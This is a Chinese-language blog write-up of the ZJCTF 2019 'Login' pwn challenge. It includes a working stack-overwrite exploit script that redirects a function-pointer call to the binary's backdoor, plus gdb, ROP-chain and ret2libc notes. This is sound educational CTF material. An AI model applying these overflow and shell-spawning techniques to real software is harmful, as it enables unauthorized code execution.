CTF-PWN-[ZJCTF 2019]Login 栈位置的转换跟踪

最新推荐文章于 2023-03-04 21:03:19 发布
最新推荐文章于 2023-03-04 21:03:19 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: CTF-PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37157335/article/details/125426685
版权

CTF-PWN-[ZJCTF 2019]Login 栈位置的转换跟踪

来源:https://buuoj.cn/challenges

内容

附件:链接:https://pan.baidu.com/s/1uBEYYeg9ouPDEOah-BHGQA?pwd=6si8 提取码:6si8

答案:PWN题为动态flag

总体思路

检查题目逻辑发现执行call的地方

通过x键检查其被调用的地方发现var130

通过动调发现该值在栈中的位置,使用题目自带的后门函数完成

详细步骤

  • 使用pip install sgtlibc安装pwn解题框架

  • 发现是cpp的题目,在password_checker的第9行下断点到判断密码的位置,随后输入用户名admin,密码cylic(300)用于测试溢出点和调用点

  • 题目是比较密码是否等于2jctf_pa5sw0rd,正确则跳转进入 (**a1)()

  • 发现此处的值是aaaa,则我们将密码设置为2jctf_pa5sw0rd\x00 +cylic(300)继续测试。

  • 同时通过回溯call eax的来源,发现其来自于ebp+var130,其在栈上的位置为0x48

    • image-20220623142338508
    • image-20220623142351067

  • 故将payload 改为 b’2jctf_pa5sw0rd\x00’.ljust(0x48,b’\x00’)即可填充到call的位置,再加上p00(shell_addr)即可完成。

  • payload

    • import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
    is_local=True,
    file='./login',
    remote='node4.buuoj.cn:27456',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
pause()
sl('admin')
# payload = ['2jctf_pa5sw0rd\x00', cyclic(300)]
# sla('pass',payload)  # 测试溢出点


shell_addr = 0x0400E88
payload = b'2jctf_pa5sw0rd\x00'
payload = payload.ljust(0x48, b'\x00')
payload += p00(shell_addr)
sla('pass', payload)
interactive()

    • 注意此处填充要使用\x00,否则会导致地址被破坏。

  • image-20220623142746138

参考文档

  • 常见知识点

    • 汇编

      leave equal mov esp,ebp; pop ebp;

      ret equal pop eip

    • 函数参数

      • x86函数传参:直接从栈上读,且参数在返回地址上方

        栈的执行顺序 ebp+(func1+f1_返回+f1_args)+(func2+f2_返回+f2_args)…

        syscall的话则需要寄存器传参:ebx,ecx,edx,esi,edi,ebp

      • x64函数传参:按 rdi, rsi, rdx, rcx, r8, r9顺序读,后续的从栈上读

        故x64需要调用ROP实现pop将参数从栈中传入寄存器

        内存地址不能大于 0x00007FFFFFFFFFFF,6 个字节长度,否则会抛出异常。

    • ret2libc注意事项

      • 当题目没有设置setbuf的时候,不要用plt.printf,否则不会有回显
      • 注意有时候远程打不通的时候,可能是因为栈没有平衡,找一个ret走一下可能就好了。

    • gdb/pwndb

      • 内存查看

        • p expresion 查看指定数值 /print
        • x 查看各类
          • x/20g address 查数据 /global
          • x/20i address 查反汇编 /
          • x/20s address 查字符串 /strings
          • x/20b address 查字节 /bytes
        • hex查看hex及asciihex address size
        • i r 查注册表 /inspect register

      • vmmap 内存查看

      • 调试

        • ni/下一步 si/进入 c/继续
        • b addr/断点 e addr/enable断点 d/disable断点 q/退出
        • set expression=xxx 设置内存

  • 常用工具

    • pwntools逆向python库
    • Kali
      • checksec:检查样本的基 本信息也可以是通过设置 pwntool.context.log_level = 'debug’得到
      • ROPgadget/ropper:检查文件中可以利用的gadgetrop-chain
        • 静态编译的题基本上都是可以一键生成ropchain的,ropper -f flower --chain “execve cmd=/bin/sh”
        • 注意在python3版本中,生成的chain需要在所有的字符串前面加上b表示十六进制值,否则会出现str不能合并bytes的报错
      • gdb:程序动态调试工具,也可以直接使用ida的远程调试功能
    • libc_searcher:用于retlibc题时候查询其libc版本
      • 在线web查询 推荐的查询器 稍菜一点的查询器
      • 离线python pip install sgtlibc ,使用 sgtlibc ./binary_file func_name:addr func2_name:addr… --dump binsh
      • docker部署离线外部查询环境 docker pull libcyber/srpnode 注意需要更新

  • 教程

  • 常见知识点

serfend
关注
专栏目录
BUUOJ PWN [ZJCTF 2019]Login
weixin_50287973的博客
11-18 376
输入这些断了下来 是在call rax那断了下来,追踪一下rax [rbp+var_130]的地址作为参数传入User::read_password(void),rax的值赋给了[rbp+var_130] 在password_checker()看看rax怎么来的 这样的话控制[rbp+var_18]为Admin::shell地址就可以了 输入password覆盖到[rbp+var_18] 0x60-0x18=72=14+58 由于_snprintf函数,写入的不含一定0字符的password格式
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1544
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
[BUUCTF]PWN——[ZJCTF 2019]Login
mcmuyanga的博客
11-05 1757
[ZJCTF 2019]Login 附件 步骤: 例行检查,64位程序,开启了canary和nx保护 2. 试运行一下程序 3. 64位ida载入,检索字符串,在程序里找到了用户名admin和密码2jctf_pa5sw0rd 再次尝试登录,无果 在程序里找到了后门函数,backdoor=0x400e88 c++写的程序,看起来有点费劲,自己看了好久都找到漏洞在哪里,后来借鉴了其他师傅的wp后才发现了猫腻 问题出现在检查密码的那个函数上 反编译出来的伪代码看起来没什么问题 但是我们按下tab,
[ZJCTF 2019]Login
、moddemod
07-03 849
exp from pwn import * context.log_level = 'debug' proc_name = './login' # p = process(proc_name) p = remote('node3.buuoj.cn', 29641) ...
[BUUCTF-pwn]——[ZJCTF 2019]Login
Y_peak的博客
03-11 400
[BUUCTF-pwn]——[ZJCTF 2019]Login 题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]Login 这道题学习还是很多的, 有的时候在源码中跟踪并不一定比在汇编代码中跟踪更快 这里最后一个函数的第一个参数会被当做函数执行,这里我就开始找那个地方可以将这个参数给改了。 v7也就是v3然后找来找去没发现。 不过汇编总是有奇效 这里有一篇博客超级详细, 我也就不在这里赘述了。 点击转跳 ...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
Elieen:使用JSON配置CTF-Pwn中的Docker容器.zip
最新发布
06-19
pwn_dockers:pwn类配置 project_path:[nullable] docker相关资源的文件夹,也是最后Dockerfile生成的文件夹 filename:二进制文件名字 docker_username:docker中运行程序的用户名 image_name:镜像文件名称,...
ZJCTF 2019 Login
pondzhang的专栏
05-19 655
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
ZJCTF_2019_Login
z1r0的博客
12-12 2455
ZJCTF_2019_Login 查看保护 输入正确的密码和用户名,会发生错误,看一下汇编。 在crash之前call 了rax,逆一下找到rax被怎样赋值的。
BUU [ZJCTF 2019]Login
fzucaicai的博客
03-04 849
这是一道让我感觉很淦的题,整一天了才大致了解了来龙去脉。
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1131
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
[ZJCTF 2019]Login--动态调试--详细版
weixin_41748164的博客
11-21 690
全网最详细login的解析,包含静态和动态分析
[ZJCTF 2019]Login的wp
wuyvle的博客
03-05 318
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 进入ida看看 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp from pwn import * io = remote('node3.buuoj.cn',28457) shell = 0x400e88 io.sendlineafter(': ','admin') io.sendlineafter('
ZJCTF_login
Morphy_Amo的博客
07-18 506
zjctf_login
2019-ZJCTF
ChenZIDu的博客
12-13 1128
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
2019ZJCTF-Web
weixin_47813861的博客
09-20 184
不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值